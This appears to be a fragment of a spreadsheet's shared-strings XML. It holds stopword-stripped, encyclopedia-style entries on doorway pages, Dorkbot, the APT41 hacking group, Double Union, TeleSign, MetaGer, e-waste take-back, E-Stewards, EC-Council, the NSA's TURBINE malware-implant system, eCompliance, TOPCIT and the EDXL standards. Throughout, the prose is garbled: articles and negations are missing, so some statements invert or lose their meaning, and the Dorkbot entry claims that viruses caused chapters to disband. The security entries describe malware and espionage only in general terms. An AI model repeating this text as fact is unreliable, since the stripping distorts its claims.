penalty complete removal sites indexed. redirection webmasters doorway pages would generally prefer users never actually pages instead delivered "real" page within sites. achieve goal, redirection sometimes used. this simple installing meta refresh doorway pages. advanced system might make cloaking. either case, redirection make doorway pages unacceptable search engines. construction content-rich doorway page must constructed search-engine-friendly manner, construed search engine spam, possibly resulting page banned index undisclosed amount time. these types doorways utilize (but limited following: title-attributed images keyword support title-attributed links keyword support culture doorway pages examined cultural political phenomenon along spam poetry flarf. also cloaking keyword stuffing pharming spamdexing redirection references external links google help doorway pages cloaking, sneaky javascript redirects doorway pages doorway pages: site ranking aids unethical shortcuts</t>
  </si>
  <si>
    <t>Dorkbot</t>
  </si>
  <si>
    <t>dorkbot group affiliated organizations worldwide sponsor grassroots meetings artists, engineers, designers, scientists, inventors, anyone else working broad umbrella electronic art. dorkbot motto "people strange things electricity". started douglas repetto columbia university computer music center 2000, dorkbot spread around world, chapters either planning actively holding meetings 2010. 2012, series viruses name appeared caused many chapters disband. purpose dorkbot meetings nurture local electronic arts community encourage emerging, established, artists present works informal peer review. while many dorkbot groups hold meetings universities students encouraged attend, dorkbot meetings restricted academic community. dorkbot groups encourage free exchange ideas electronic arts, regular attendees dorkbot often visit another travelling, serving informal ambassadors groups. also artbots café scientifique hackspace maker faire nerd nite references external links dorkbot main page footage dorkbot events "questions self-organisation: dorkbot" interview repetto pixelache 2008 helsinki festival "technical knock-outs" davis, artnet magazine dorkbot</t>
  </si>
  <si>
    <t>Double Dragon (hacking group)</t>
  </si>
  <si>
    <t>double dragon (also known apt41, barium, winnti, wicked panda, wicked spider, tg-2633, bronze atlas, kelpie, blackfly) hacking organization alleged ties chinese ministry state security (mss). classified advanced persistent threat, organization named united states department justice september 2020 relation charges brought five chinese malaysian nationals allegedly compromising companies around world.in 2019, cybersecurity company fireeye stated high confidence group sponsored chinese communist party (ccp) conducting operations financial gain. name “double dragon” originates duality operation, engage espionage individual financial gain. devices usually used state-sponsored intelligence. investigations conducted fireeye found operations multiple sectors, healthcare, telecommunications, technology. group conducts many financial activities video game industry, including development studios, distributors, publishers.apt 41's operations described "moonlighting" balance espionage supported chinese state financially motivated activities outside state authorisation downtime. such, harder ascertain whether particular incidents state-directed not. organisation conducted multiple operations countries, notably united states. such activities include incidents tracking, compromising business supply chains, collecting surveillance data. ties chinese government uses cyber-espionage malware typically kept exclusive chinese government. this characteristic common advanced persistent threats, allows derive information high-profile targets make contact gain information benefits national interest. relation chinese state evidenced fact none information dark obtained ccp.apt targeting consistent chinese government's national plans move high research development fields increase production capabilities. such initiatives coincide chinese government's “made china 2025” plan, aiming move chinese production high-value fields pharmacy, semi-conductors, high-tech sectors.fireeye also evaluated moderate confidence engage contract work associated chinese government. identified personas associated group previously advertised skills hackers hire. their usage homeunix photo personal financially motivated operations, malware unaccessible public used state-sponsored espionage actors also evidences stance. also recognised china skilled hackers tend work private sector government contracts higher pay. fireeye report also noted chinese state depended contractors assist state operations focused cyber-espionage, demonstrated prior chinese advanced persistent threats like viewed potentially made skilled chinese citizens, utilised employed chinese government, leading assumptions members group often work jobs, supported operating hours. espionage activity 41's targeting deemed fireeye correlate china's national strategies goals, particularly regarding technology. targeting tech firms align chinese interest developing high-tech instruments domestically, demonstrated 12th 13th five-year plans. attack organisations various different sectors believed fireeye indicative fulfilling specifically assigned tasks. campaigns attributed also demonstrates group used obtain information major political financial events.the german company teamviewer behind popular software name allowed system control remotely, hacked june 2016 according fireeye security conference. group able access systems teamviewer users around world obtain management details information regarding businesses. financially motivated activities targeted video-game industry majority activity focused financial gain. chinese internet forums indicated associated members linked advertised hacking skills outside chinese office hours profits. fireeye reported case, group able generate virtual game currency sell buyers underground markets laundering schemes, could sold us$300,000. although typical method used group collecting money, also attempted deploy ransomware profit operations.fireeye reports 41's financially motivated activity occurs later night early morning, could mean activities completely unrelated espionage activities. fireeye reports 41's activities average 10:00 23:00 china standard time, typical chinese tech workers follow “996” work schedule.apt uses digital certificates obtained video game developers producers sign malware. through application different digital certificates, target gaming non-gaming organisations avoid detection ensure compatibility systems target. 2012, certificate south korean game publisher leveraged sign malware members gaming industry.' 2021 launched series attacks illegal gambling industry china. techniques operating techniques distinct, particularly usage passive backdoors compared traditional ones. while traditional backdoors utilised advanced persistent threats easily detectable, technique often much harder identify. techniques applied financially motivated activity also include software supply-chain compromises. this allowed implement injected codes legitimate files distributed, endanger organisations stealing data altering systems. sophisticated malware often deployed well remain undetected extracting data. bootkits also type malware used group, difficult detect harder find amongst cyber espionage cybercrime groups, making harder security systems detect malicious code.spear-phishing emails regularly utilised across cyber espionage financial attacks. group sent many misleading emails attempt take information high-level targets gathering personal data increase likelihood success. targets varied media groups espionage activities bitcoin exchanges financial gain. department justice 16th september 2020, united states department justice released previously sealed charges chinese malaysian citizens hacking companies across world. these include firms involved social-media, universities, telecommunications providers, software development, computer hardware, video-games, non-profit organizations, think tanks, foreign governments, pro-democracy supporters hong kong. attacks said involved theft code, code signing certificates, customer data business information. deputy attorney general jeffrey rosen says actions involved hackers plant “back-doors” software allowed direct access systems software provider's company. chinese hackers also conducted attacks gaming industry, involved least companies york, texas, washington, illinois, california, united kingdom.the district court district columbia distributed warrants calling seizure accounts, servers, domain names, pages used hackers conduct operations. responsibility executing warrants well private sector companies. microsoft also developed technical measures prevent continued access computer systems victims. federal bureau investigation released report containing technical information used private sector groups.the justice department congratulated malaysian government, particularly attorney general's chambers malaysia royal malaysia police, cooperating aiding arrest malay nationals, particularly since difficulties arresting foreign hackers general. press release mentioned microsoft, google, facebook verizon media groups helped investigation. also credited taiwanese ministry justice investigation bureau, helped provide information authorities discovering servers california.contrastingly, rosen criticises chinese communist party inaction came assisting arrest chinese hackers associated rosen also claimed chinese communist party “making china safe cyber criminals” continue assist espionage. chinese foreign ministry spokesman wang wenbin says uses cybersecurity issues “attack china” spreading false information, political manipulation.this announcement made president donald trump's re-election campaign, associating chinese communist party various cyber-espionage attacks. alongside russia iran, china identified national threat assessment election. links groups overlaps activity public reporting groups barium winnti. terms technique, many overlaps digital certificates malware. according fireeye, prominent similarities similar malware, particularly highnoon, across various areas activity. highnoon malware reported fireeye grouped group (also known ke3chang, vixen panda, gref, playful dragon). however, later found work multiple chinese groups share tools strategies. digital certificate distributed video game company japan used well groups digital certificate allegedly microsoft certificate authority also used non-public malware used linked alleged chinese state-sponsored groups, indicate shared resources groups. associated personnel earlier activities, used domains registered monikers “zhang xuguang” (simplified chinese: 张旭光) “wolfzhi”. these online personas associated 41's operations specific online chinese language forums, although number individuals working group unknown. “zhang xuguang” activity online forum chinese hackers alliance (simplified chinese: 客同盟). information related individual includes year birth, 1989, former living inner mongolia. persona also posted forum regarding wushu online game, using moniker “injuriesa” 2011. emails online domains associated “wolfzhi” also lead data science community profile. forum posts also suggest individual beijing nearby province, hebei.the issued wanted posters haoran zhang, dailin tan, chuan qian, qiang lizhi jiang, found linked zhang indicted august 2019, grand jury district columbia charges associated hacking offences, unauthorised access protected computers, aggravated identity theft, money laundering wire fraud. these actions conducted high-tech companies, video-game companies unnamed individuals united states united kingdom worked together. also charged qian, jiang august 2020, racketeering, money laundering, fraud, identity theft. three individuals part management team chengdu network technology company, three coworkers planned cyber attacks companies individuals industries like communications, media, security, government. such operations occur countries like united states, brazil, germany, india, japan, sweden, tibet, indonesia, malaysia, pakistan, singapore, south korea, taiwan, thailand.in august 2020, wong ling yang ching, charged racketeering, conspiracy, identity theft, aggravated identity theft fraud amongst others. united states department justice says malaysian businessmen working chinese hackers target video game companies united states, france, south korea, japan singapore profit operations. these schemes, particularly series computer intrusions involving gaming industries, conducted malaysian company gamer mall, founded wong. september 2020, malaysian authorities arrested individuals sitawan. also apollo apt40 references</t>
  </si>
  <si>
    <t>Double Union</t>
  </si>
  <si>
    <t>double union francisco hacker/maker space. double union founded women 2013 explicit goal fostering creative safe space. organization’s mission community workshop women nonbinary people work projects comfortable, welcoming environment.members hold public members-only events activities workshops like zine making, paper circuits electronics, coding, sewing, 3-dimensional printing, lightning talks, print making many others. carrying members allowed invite guests gender. history founded 2013 group women including amelia greenhall, valerie aurora, henry lacenski connections hackerspaces; initiative's feminist unconference, adacamp; geekfeminism.org, collecting initial funding indiegogo campaign. later year, lacenski left group, claiming unnamed cofounders practiced form activism considered aggressive. there board directors structure place voting members; 2015, around 150–200 members.du's logo bright pink unicode character (u+22d3), mathematical operators block. originally located mission district, double union relocated potrero hill neighborhood francisco fall 2015 building sold landlord. fund move several equipment purchases, double union undertook indiegogo campaign, finished percent goal. physical space first years, space 700-square-foot room mission neighborhood, 14th mission building. 2015, space potrero neighborhood francisco. projects several double union members created managing hackerspace membership applications, arooo. arooo free licensed gpl. double union created open diversity data project. project aggregates diversity data wide array tech companies. also liberating ourselves locally mothership hackermoms noisebridge references external links official website</t>
  </si>
  <si>
    <t>TeleSign</t>
  </si>
  <si>
    <t>telesign company based marina california, united states providing digital identity programmable communications apis prevent fraud enable omnichannel engagement. telesign’s risk scoring analyzes phone number attributes acquired authentication process assist companies onboarding customers securely maintaining account integrity. burton current company.history founded 2005 communications platform service company darren berkovitz, ryan disraeli stacy stubblefield, company pioneered two-factor authentication services, secure supplementary method preventing illicit access online accounts. co-founders disraeli, stubblefield berkowitz named alumni entrepreneurs year. telesign early project technology incubator curious minds. 2014, company raised million funds.in april 2017, telesign announced acquired bics, belgium-based company $230 million.in december 2021, telesign announced intends public business combination north atlantic acquisition corporation (nasdaq: naac). references</t>
  </si>
  <si>
    <t>SAINT Corporation</t>
  </si>
  <si>
    <t>MetaGer</t>
  </si>
  <si>
    <t>metager metasearch engine focused protecting users' privacy. based germany, hosted cooperation german 'suma-ev association free access knowledge' university hannover, system built small-scale crawlers metager's control. september 2013, metager launched metager.net, english-language version search engine. features search queries relayed many search engines. results filtered, compiled sorted presented user. users select search engines query according individual choices among options (such "check availability sort date"). privacy protection implemented several features: metager provides access services encrypted connections. december 2013, also hidden service (b7cxf4dkdsko6ah2.onion/tor/) allows users access metager search functionality within network. since february 2014 metager additionally offers option open result webpages anonymously ("open anonymously"). since 29th august 2013 english version metager available. metager's source code released gitlab 16th august 2016. references external links official website</t>
  </si>
  <si>
    <t>Take-back system</t>
  </si>
  <si>
    <t>take-back system take-back system primary channels waste collection, especially e-waste, besides municipal sites. take-back idea manufacturers "take back" products lives. take-back aimed reduce business' environmental impacts earth also increase efficiency lower costs business models. "take-back regulations targeted wide array products including packaging, batteries, automobiles, electronics" economic value found recycling re-manufacturing products. "the programs benefit municipalities lowering overall waste disposal costs reducing burden landfill sites". although certain companies, take-back system mandatory legislation, many voluntarily.take-back split store retailer take-back producer take-back.it split types recycling re-manufacturing recycling major option take-back system includes store retailers producers taking back products distributed consumers order recycle materials products. take-back system encourages businesses redesign products ones easily recyclable, reducing burden virgin materials environment present future. this also gives companies alternative supply minerals. re-manufacturing major option take-back system includes store retailers producers taking back products order create ones. this process uses older products order restore products quality ones. process, companies save energy would used manufacture brand products. economic effect take-back system shown economic effects many companies adapted example xerox, company saved $200 million take-back program year alone. system encourages companies create products easy dissemble re-manufacture order costs generate revenue taking back older products. way, companies older products would otherwise thrown away order renovate them, allowing sold sprint has, order save billion dollars. wisconsin, development take-back system created many jobs, started companies, brought revenue e-waste processing. environmental impact take-back system provides environmentally friendly system inherit system gives responsibility handling waste producer, meaning guarantee products dealt lives. taking products back, companies reduce environmental footprint world products influenced become easily recyclable. system influences companies redesign products ways cost-effective recycle, reuse, re-manufacture products. policies system require companies using certain amount recycled material products, reduces amount recovered materials landfills incineration. circular economy take-back system main component business model called circular economy. circular economy plan business company aims reduce waste order become sustainable own. take-back system allows model work allows companies recycle products order become environmentally friendly, materials used products order resources encourage sustainability. that, companies, take-back system shows cost-effective system effectively minimizes waste management costs. take-back system implemented collection high cost recycling amount customer incentive, companies countries refrain adapting take-back system. this, e-waste could taken back producers donations, re-manufacturing, upgrades. waste regulation legislation government help without legislation, prominent take-back system cannot achieved current e-waste regulation systems "limited private recycling high-value waste limited consumer participation". rules regulations would incentive issues regarding dumping electronic waste landfills prevent illegal exportation electronic waste important achieve success e-waste management. government would need support giving incentives correct infrastructure order create system. initiatives "initiatives refer programs schemes required promote effective collection, recycling disposal e-waste". through incentives, government producers waste must promote e-waste management giving effort collecting e-waste recycle, renew, reuse awareness responsibility consumers products must become aware managing waste affects environment lack programs help teach aspects show barriers effective management waste. manage waste properly, consumers must begin show responsibility bringing e-waste companies producers products must responsible taking back dealing germany's take-back system germany packaging ordinance june 1991. specifies mandatory quotas recycling glass, paper/paperboard/carton, plate, aluminum, plastic, composites". responsibility handling waste onto manufacturer distributor. result ordinance, 1993, beginning mandatory quotas, compared 1992, 500,000 fewer tons packaging" "from 1993 1994, paper packaging recycling increased 70.6%". system showed success, reduced waste redesigned packaging environmentally friendly simply integrating version take-back system. issues while take-back system aims create eco-friendly businesses, reasons profoundly exist today. main reason lack incentives. being products cars computers unappealing transport, consumer finds troubling unappealing bring products back. also, since many consumers refurbished products inferior trust them, unappealing companies re-manufacture products reselling purposes thus cannot profit without appropriate subsidies, cases becomes beneficial company virgin materials opposed recycling methods cheaper, swaying away take-back system. references images</t>
  </si>
  <si>
    <t>E-Stewards</t>
  </si>
  <si>
    <t>e-stewards initiative electronics waste recycling standard created basel action network. program organization created grew concern electronic waste generated wealthy countries dismantled poor countries, often underage workers. young workers exposed toxic metals working unsafe conditions.in 2009, published e-stewards standard responsible recycling reuse electronic equipment forth requirements becoming certified e-stewards recycler—a program "recognizes electronics recyclers adhere stringent environmentally socially responsible practices recovering hazardous electronic materials." recyclers qualified older pledge program september 2011 achieve certification standard e-stewards accredited certification body accredited anab (ansi-asq national accreditation board). standard e-stewards standard responsible recycling reuse electronic equipment developed basel action network. industry-specific environmental management system standard basis e-stewards initiative. march 2012, released updated revised version open public comment prior final adoption later spring 2012. certification available electronics recyclers refurbishers. achieve e-stewards certification organizations subject initial stage stage audit. after passing audits accepted ban, yearly surveillance audits take place ensure organizations standard registered 14001 environmental management system place, well achieving numerous performance requirements including assuring export hazardous electronic wastes developing countries, prison labor dumping toxic materials municipal landfills. also basel convention basel action network electronic waste electronic waste country 14001 e-cycling digger gold hazardous waste references external links e-stewards (official website locator) basel action network</t>
  </si>
  <si>
    <t>EC-Council</t>
  </si>
  <si>
    <t>international council electronic commerce consultants (ec-council) american organization offers cybersecurity certification, education, training, services various cybersecurity skills. ec-council headquartered albuquerque, mexico, certified 237,000 professionals countries. history ec-council co-founded 2001 haja mohideen bavisi response september attacks certify professionals could protect attacks electronic commerce. haja mohideen creator popular certification programs ceh, chfi, ecsa/lpt launched certified ethical hacker (ceh) program white hackers 2003. instead founding entirely schools, ec-council became certifier training courses exams, mobilizing entrepreneurs information security training business. expanded rapidly, 2007 courses offered countries.on february 2010, united states department defense updated directive information security require computer network defenders pass certification ec-council. chosen pentagon oversee training department defense employees work computer security-related jobs.ceh released september 2020. certifications ec-council offers professional certifications security field, certified network defender (cnd), certified chief information security officer (cciso), computer hacking forensics investigator (chfi). also offers certifications fields related security, including disaster recovery, software security, digital forensics, general security knowledge. security professional certifications certified secure computer user (cscu) ec-council certified encryption specialist (eces) ec-council certified security specialist (ecss) certified network defender (cnd) certified ethical hacker (ceh) certified ethical hacker (master) certified penetration tester (cpent) licensed penetration tester (master) certified network defense architect (cnda) computer hacking forensic investigator (chfi) ec-council certified incident handler (ecih) ec-council disaster recovery professional (edrp) certified application security engineer (case) (java .net) certified blockchain professional (cbp) advanced network defense (cast 614) ec-council certified chief information security officer (cciso) services products ec-council university (eccu) ec-council university (eccu) incorporated wyoming 2003 licensed mexico higher education department 2006. offers bachelor’s master’s degrees cybersecurity graduate certificate programs. ec-council codered ec-council codered launched 2019 cybersecurity learning platform library 4,000 video lessons. provides "microdegrees" niche technical subjects. ec-council global services ec-council global services (egs) consulting services division ec-council group. received crest membership cyber incident response, penetration testing, vulnerability assessment services 2020. ec-council aware ec-council aware cybersecurity training launched 2020 android. ec-council cyberq ec-council launched cyberq platform 2020. cloud-based cyber range platform automates process using cloud technology deploy cyber targets. ec-council events ec-council hosts various security conferences including hacker halted, global cyberlympics, takedowncon, global ciso forum. references</t>
  </si>
  <si>
    <t>TURBINE (US government project)</t>
  </si>
  <si>
    <t>turbine codename automated system essence enables automated management control large network implants form remotely transmitted malware selected individual computer devices bulk tens thousands devices). built infrastructure enables covertly hack computers mass scale using automated systems reduce level human oversight process. quoted intercept, turbine designed "allow current implant network scale large size (millions implants) creating system automated control implants groups instead individually." shared many files implants counterparts so-called five eyes surveillance alliance united kingdom, canada, zealand, australia. among things turbine control implants capable breaking targeted computers siphoning data foreign internet phone networks infecting target's computer exfiltrating files hard drive covertly recording audio computer's microphone taking snapshots webcam launching cyberattacks corrupting disrupting file downloads denying access websites exfiltrating data removable flash drives connect infected computerthe turbine implants linked relies upon, large network clandestine surveillance "sensors" installed locations across world, including agency's headquarters maryland (fort george meade) eavesdropping bases used agency misawa, japan (misawa base) menwith hill, england (raf menwith hill). codenamed turmoil, sensors operate sort high-tech surveillance dragnet, monitoring packets data sent across internet. when turbine implants exfiltrate data infected computer systems, turmoil sensors automatically identify data return analysis. targets communicating, turmoil system used send alerts "tips" turbine, enabling initiation malware attack. identify surveillance targets, uses series data "selectors" flow across internet cables. these selectors include email addresses, addresses, unique "cookies" containing username identifying information sent user's computer websites google, facebook, hotmail, yahoo, twitter, unique google advertising cookies track browsing habits, unique encryption fingerprints traced specific user, computer sent across internet windows computer crashes updates. also global surveillance disclosures (2013–present) prism (surveillance program) enforcement information exchange references</t>
  </si>
  <si>
    <t>ECompliance</t>
  </si>
  <si>
    <t>ecompliance biometrics based android application loaded onto android tablet connected fingerprint reader and/or iris scanner. developed microsoft research operation asha dedicated healthcare treatment, especially tuberculosis used ensure adherence various protocols ensuring accurate measurements transparency operations. used provide adherence directly observed therapy, short-course (dots) protocol treatment india cambodia. also used operation asha ensure patient adherence hemophilia treatment protocol. ecompliance replicated third parties various countries, including uganda, kenya, peru, dominican republic, afghanistan, tanzania. rolled nearly 28,000 hemophilia patients. system recorded million transactions. tablet ecompliance used connected central server internet updates server whenever synced, allowing data easily accessed central server. hence work offline well. description treatment, patients enrolled ecompliance scanning fingerprints time registration operation asha’s program. basic demographic data, like address phone number, recorded system along schedule patient coming operation asha’s centers take medication. when patients treatment center take medication, fingerprint scanned along fingerprint health worker present. only medicine given patient swallow. simultaneous scanning fingerprints proof medicine given direct supervision, required dots protocol treatment operation asha follows. patient fails show health worker gets text message ecompliance system. health worker goes patient's house give medication scan fingerprint proof medication intake. thus, ecompliance decreased number missed doses drastically default rate (i.e. rate patients drop treatment program) also reduces huge margin. research western uganda, research carried determine efficacy impact ecompliance treatment patients through direct observation patients, dots outcomes patients ecompliance intervention group compared patients control groups. found intervention patients higher cure rate patients (55% versus 28.3%). intervention group default rate follow rate lower groups versus 7%). also, intervention group significantly lower odds negative dots outcome versus 17%). perceived impact ecompliance evaluated interviews health workers, center owners, patients found ecompliance helps draw patients treatment centers incentivizing health workers convince patients come, persuading patients in-person visits important. professor yanis amor describes system staggering improvement". references</t>
  </si>
  <si>
    <t>TOPCIT</t>
  </si>
  <si>
    <t>test practical competency (topcit) performance-evaluation-centered test designed diagnose assess competency information technology specialists software developers critically needed perform jobs professional frontier. topcit developed administered korea's ministry science, future planning (msip) institute information communications technology promotion. they government agencies overlook manage related r&amp;d, policy, development. background companies higher education institutions voiced need standardized objective competency index reinforce on-site competency ict/sw college students narrow viewpoints industrial academic circles regarding qualifications competent specialist field. objective improve quality ict/sw education universities, resolve manpower shortage experienced companies, expand growth potential ict/sw industries education system: topcit developed objectively assess competency planning entering field. analyzed data assist universities industries admitting students hiring recruits respectively. topcit measures competency evaluating test-takers’ answers series creative problem solving questions assessing executive ability. participating companies universities total people companies educational academies participated founded topcit (august 2013). through mutual development companies academies, topcit made objective closing industry academic circles regarding practical qualifications competent specialist field. through systematic network companies schools, demand skilled workers companies want skilled workers educational academies graduate also closed. contents topcit total questions 1,000 points. there types questions test: multiple-choice, short-answer, descriptive-writing, critical-thinking questions. there technical field business field topcit. technical field technical field tests ability software development, database construction operation, understanding utilization network security. software: software module tests test takers' understanding software, ability analyze design software, develop test software, manage software, implement integrated technology. database: database module tests knowledge concepts structure database, ability design, program, operate database, understanding database applications. network security: network security module tests examinees’ knowledge network concepts, network infrastructure technology, network application technology, security, ability security, knowledge latest security technology standards business field business field tests ability understanding business, technical communication skills, project management. business: business module consists understanding business utilizing business technical communications: technical communication module consists understanding business communications utilizing technical documentation. project management: project management module consists understanding project, project management, project tools evaluation. test scores there five topcit competency levels categorized shown table below. notes references external links test practical competency test practical competency korean) institute information communications technology promotion korean)</t>
  </si>
  <si>
    <t>EDXL Sharp</t>
  </si>
  <si>
    <t>edxl sharp .net implementation oasis emergency data exchange language (edxl) family standards. purpose libraries allow developers parse edxl messages string underlying stream programmatically create edxl messages validate edxl messages schema validate edxl messages conform additional business rules specified standards documentation write edxl messages string underlying stream about project edxl sharp licensed apache license part collaborative research project mitre corporation. what's edxl sharp version includes following: library (common alerting protocol) v1.2 library common types across edxl standards library edxl-de (distribution element) v1.0 library edxl-have (hospital availability exchange) v1.0 library edxl-rm (resource message) v1.0 graphical user interface (gui) edxl-de test tool library geooasis where profile library edxl xpil (extensible party information language) profile beta library edxl-sitrep (situation reporting) beta library edxl-tep (tracking emergency patients)as august 2010 version released. some draft standards implementations separate source tree branch stable alphas. online testbed this effort part larger interoperability testbed. interop testbed serves online presence learning edxl, implement systems using edxl, online validation information sharing tools, place perform integration systems edxl. also edxl oasis niem external links edxl sharp codeplex page edxl wiki oasis em-tc public page oasis ema-tc wiki</t>
  </si>
  <si>
    <t>EDXL</t>
  </si>
  <si>
    <t>emergency data exchange language (edxl) suite xml-based messaging standards facilitate emergency information sharing government entities full range emergency-related organizations. edxl standardizes messaging formats communications parties. edxl developed royalty-free standard oasis international open standards consortium.edxl designed enable information life-saving resources shared across local, state, tribal, national non-governmental organizations. implementation edxl standards aims improve speed quality coordinated response activities allowing exchange information real time. background edxl advanced oasis emergency management technical committee, group formed 2003 remains open participation organizations, agencies, individuals around world. edxl based detailed requirements draft specifications provided oasis emergency practitioners, support emergency interoperability consortium, project sponsored united states department homeland security’s disaster management e-gov initiative. edxl-de approved oasis standard 2006; edxl-rm –have approved oasis standards 2008. implementation edxl promoted oasis emergency management adoption committee, formed 2009. components edxl suite comprises number individual standards. each standard elaborated following sub-sections: edxl-de (distribution element) overview edxl-de (distribution element) oasis standard, xml-based header wrapper provides flexible message-distribution emergency information systems’ data sharing. messages exchanged specific recipients, geographic area, codes incident agency type (police, fire, etc.). content payload distributed using edxl messages. purpose primary purpose distribution element facilitate routing properly formatted emergency message recipients. distribution element thought "container". provides information route "payload" message sets (such alerts resource messages), including routing information distribution type, geography, incident, sender/recipient ids. conformance although schema edxl-de, "business rules" conformance rules developer must comply order considered conformant compliant edxl-de standard. here list compliance rules edxl-de standard document: background disaster management egov initiative department homeland security (dhs) determined 2004 launch project develop interagency emergency data communications standards. called together group national emergency response practitioner leaders sought guidance requirements standards. june, 2004 first meeting identified need common distribution element emergency messages. subsequent meetings standards working group developed detailed requirements draft specification distribution element (de). during period initiative forming partnership industry members emergency interoperability consortium (eic) cooperate development emergency standards. leading sponsor common alerting protocol (cap). both organizations desired develop expanded family data formats exchanging operational information beyond warning. members participated development broader design design process development additional standards. this named emergency data exchange language (edxl). goal edxl project facilitate emergency information sharing data exchange across local, state, tribal, national non-governmental organizations different professions provide emergency response management services. edxl accomplish goal focusing standardization specific messages (messaging interfaces) facilitate emergency communication coordination particularly profession involved. "emergency management" domain exercise. national effort including diverse representative group local, state federal emergency response organizations professionals, following multi-step process. just data-focused effort targets shared data elements, edxl process looks shared message needs, common across broad number organizations. objective rapidly deliver implementable standard messages, incremental fashion, directly emergency response agencies trenches, providing seamless communication coordination supporting particular process. effort first addresses urgent needs proceeds subsequent message sets prioritized fashion. goal incrementally develop deliver standards. edxl intended suite emergency data message types including resource queries requests, situation status, message routing instructions like, needed context cross-disciplinary, cross-jurisdictional communications related emergency response. priorities requirements created edxl standards working group (swg) formalized group emergency response practitioners, technical experts, industry. draft specification trialed number members starting october, 2004. november, 2004, formally submitted draft oasis emergency management technical committee standardization. edxl-rm (resource messaging) overview edxl-rm (resource message) oasis standard, describes suite standard messages sharing data among information systems coordinate requests emergency equipment, supplies, people. purpose primary purpose emergency data exchange language resource messaging (edxl-rm) specification provide standard formats emergency response messages. these resource messages specifically designed payloads emergency data exchange language distribution element- (edxl-de)-routed messages. together edxl-de edxl-rm intended expedite activities associated resources needed respond adapt emergency incidents. distribution element thought "container". provides information route "payload" message sets (such alerts resource messages), including routing information distribution type, geography, incident, sender/recipient ids. resource message constrained resource message types contained specification. resource message intended payload payloads distribution element contains history disaster management (dm) communications program department homeland security’s (dhs) office interoperability compatibility (oic) managed science technology (s&amp;t) directorate. program initiated president’s e-government initiatives. dm’s mission serve program within federal government help local, tribal, state, federal public safety emergency response agencies improve public safety response effective efficient interoperable data sharing. program sponsors practitioner steering group (psg). practitioner steering group (psg) governance formalized following publication edxl distribution element. plays role direction, prioritization, definition, execution dhs-dm program. group composed representatives major emergency response associations, setting priorities providing recommendations regarding messaging standards development well facets program. specified messaging standards-based systems interoperability priority disaster management program. edxl resource messaging specification effort identified priority standard group following edxl-de. requirements specification effort initiated group partnership industry members emergency interoperability consortium (eic) standards working group (swg). that group developed draft specification submitted oasis emergency management technical committee begin work edxl-rm specification. process remained edxl-de specification exception technical committee requested initial candidate specification submitted expert group recast formal requirements document according template technical committee provided expert group. candidate specification resubmitted along requested requirements document. edxl-have (hospital availability exchange) overview edxl-have (hospital availability exchange) oasis standard, allows hospital's status, services, resources (including capacity, emergency department status, available service coverage) communicated. purpose edxl-have specifies document format allows communication status hospital, services, resources. these include capacity availability, emergency department status, available service coverage, status hospital’s facility operations. history disaster emergency situation, need hospitals able communicate other, members emergency response community. ability exchange data regard hospitals’ availability, status, services, capacity enables hospitals emergency agencies respond emergencies disaster situations greater efficiency speed. particular, allow emergency dispatchers managers make sound logistics decisions route victims, hospitals ability provide needed service. many hospitals expressed need for, indeed currently using, commercial self-developed information technology allows publish information hospitals region, well eocs, 9-1-1 centers, responders web-based tool. systems available today record present data standardized format, creating serious barrier data sharing hospitals emergency response groups. without data standards, parties various kinds unable view data hospitals state region different system unless specialized interface developed. alternatively, officials must special passwords toggle pages full picture. other local emergency responders unable data imported emergency tools (e.g. 9-1-1 computer-aided dispatch system consequence information management system). they must pass word appropriate page. this inefficient. uniform data standard allow different applications systems communicate seamlessly. 2013 oasis technical committee created sub-committee revise have. have version development draft schema working documents place. have version aimed addressing shortfalls have v1.0 (and unofficial have v1.1 evolved informally) increase depth support non-hospital facilities (e.g. urgent care clinics, long-term care facilities, temporary facilities). common alerting protocol (common alerting protocol) oasis standard preceding edxl-de often included edxl family. edxl-sitrep (situation reporting) overview edxl-sitrep (situation reporting) completed detailed practitioner requirements process 2008 submitted u.s. department homeland security oasis begin standards process march 2009. purpose edxl-sitrep provide standard format sharing general information across disparate systems public private organization emergency support function (esf), situation, incident event operational picture current required response. purpose edxl-sitrep guide effective preparation, response, management recovery seamless summary-level information-sharing before, emergencies disasters scale. edxl-tep (tracking emergency patients) overview edxl-tep messaging standard primarily exchange emergency patient tracking information patient encounter hospital admission release. supports patient tracking across incident continuum care, well evacuations hospitals hospital patient transfers, providing real-time information responders, emergency management, coordinating organizations care facilities involved incidents chain care transport. purpose embraces larger phase effort objectives tracking everyone affected requiring emergency service assistance result mass casualty incident, aimed increased effectiveness emergency medical services management, patient tracking, continued patient care preparedness emergency care. driven cross-profession practitioner needs (practitioner steering group expanded stakeholder groups), national association state officials (nasemso). supports select goals hhs-agency health research quality (ahrq) gaps identified health information technology standards panel (hitsp). government support u.s. department homeland security increasingly embraced edxl suite standards. official grant guidance requires grantees information systems funded department. related standards customer information quality customer information quality another oasis standard used edxl-rm edxl-have. specifications party, person, organization information. tc's objective producing specification "global" identification discovered include information applicable emergency management domain. light profile developed maintained compliance original specification, removed items needed edxl. geooasis where geography markup language (gml) grammar defined open geospatial consortium (ogc) express geographical features. edxl data standards implement profile standard called "geooasis where". national information exchange model national information exchange model (niem) xml-based information exchange framework united states. niem represents collaborative partnership agencies organizations across levels government (federal, state, tribal, local) private industry. edxl considered niem compliant adapters contained within niem core. ieee 1512 related series standards sponsored united states department transportation critical emergency operations. ieee 1512 family standards incident management traffic incident related message sets. they provide incident management message sets common traffic management, public safety, hazardous materials incident response activities. also edxl sharp content assembly mechanism emergency management software computer-assisted dispatch references</t>
  </si>
  <si>
    <t>E-Pro (certification)</t>
  </si>
  <si>
    <t>e-pro (styled e-pro) internet professional certification program approved national association realtors (nar) members. members canadian real estate association (crea) also pursue e-pro certification logo completing online learning program. four core areas study (arranged modules) are: internet fundamentals (e.g., internet service providers, electronic mailing lists, domain names, dns). e-mail communication methods strategies clients/customers. world wide uses developing real estate business. other technology (hardware software, general purpose real estate industry-specific).the course material prior 2010 based real estate technology guide.in 2010 entire e-pro course re-written bill lublin team social media marketing institute. course winner 2011 award best educational offering real estate educators association (reea). also real estate professional designations references external links official website</t>
  </si>
  <si>
    <t>TOG (hackerspace)</t>
  </si>
  <si>
